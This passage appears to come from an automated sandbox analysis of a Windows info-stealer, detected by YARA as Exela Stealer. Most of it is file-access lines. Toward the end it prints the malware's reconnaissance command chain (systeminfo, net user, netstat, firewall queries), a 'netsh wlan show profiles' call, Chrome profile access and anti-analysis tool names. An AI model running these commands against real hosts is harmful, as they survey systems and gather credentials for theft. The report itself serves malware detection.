            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\yarl VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\yarl VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_helpers.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_writer.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_parser.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_uuid.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist\_frozenlist.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_cffi_backend.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404EC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6404EC330
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640504F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF640504F10
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Modifies the windows firewall
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ollydbg.exe

            Stealing of Sensitive Information

            barindex
            Yara detected Exela Stealer
            Source: Yara matchFile source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rename_me_before.exe PID: 3512, type: MEMORYSTR
            Yara detected Python Stealer
